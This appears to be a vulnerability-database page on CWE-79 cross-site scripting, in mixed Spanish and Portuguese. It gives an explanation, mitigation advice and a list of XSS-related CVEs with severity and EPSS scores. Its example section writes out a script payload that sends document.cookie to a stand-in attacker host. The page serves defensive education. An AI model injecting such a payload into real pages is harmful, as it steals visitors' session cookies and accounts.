Fallos del tipo CWE-79

29.217 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-36863MEDIUMWordPress Quiz And Survey Master plugin <= 7.3.4 - Auth. Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2024-0612MEDIUMContent Views <= 3.6.2 - Authenticated(Administrator+) Stored Cross-Site Scripting via settingsEPSS 0.5%CVE-2026-64971MEDIUMReflected XSS in ATutorEPSS 0.5%CVE-2024-30885MEDIUMReflected Cross-Site Scripting (XSS) vulnerability in HadSky v7.6.3, allows remote attackers to execute arbitrary code and obtain sensitive EPSS 0.5%CVE-2024-2200MEDIUMContact Form by BestWebSoft <= 4.2.8 - Reflected Cross-Site Scripting via cntctfrm_contact_subjectEPSS 0.5%CVE-2022-44590MEDIUMWordPress Simple Video Embedder plugin <= 2.2 - Auth. Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2022-25781MEDIUMReflected XSS issues in GateManagerEPSS 0.5%CVE-2024-21636MEDIUMview_component Cross-site Scripting vulnerabilityEPSS 0.5%CVE-2026-9838MEDIUMICS Calendar <= 12.0.9 - Reflected Cross-Site Scripting via 'htmltagtitle' ParameterEPSS 0.5%CVE-2024-1412MEDIUMMemberpress <= 1.11.24 - Reflected Cross-Site Scripting via message and errorEPSS 0.5%CVE-2023-3532HIGHCross-site Scripting (XSS) - Stored in outline/outlineEPSS 0.5%CVE-2020-37245HIGHWordPress Plugin Supsystic Digital Publications 1.6.9 Path Traversal XSSEPSS 0.5%CVE-2021-32009MEDIUMMissing XSS guards on firmware pageEPSS 0.5%CVE-2026-42523CRITICALJenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the featuEPSS 0.5%CVE-2026-55105HIGHJoplin: Fountain embeds allow arbitrary script execution in published notes and the note viewerEPSS 0.5%CVE-2026-21269MEDIUMColdFusion | Cross-site Scripting (Stored XSS) (CWE-79)EPSS 0.5%CVE-2026-87915HIGHPopup Maker <= 1.24.0 - Unauthenticated Stored Cross-Site Scripting via values[Name] ParameterEPSS 0.5%CVE-2023-2735MEDIUMGroundhogg <= 2.7.9.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%CVE-2024-10882MEDIUMProduct Delivery Date for WooCommerce - Lite <= 2.8.0 - Reflected Cross-Site ScriptingEPSS 0.5%CVE-2022-44380MEDIUMSnipe-IT before 6.0.14 is vulnerable to Cross Site Scripting (XSS) for View Assigned Assets.EPSS 0.5%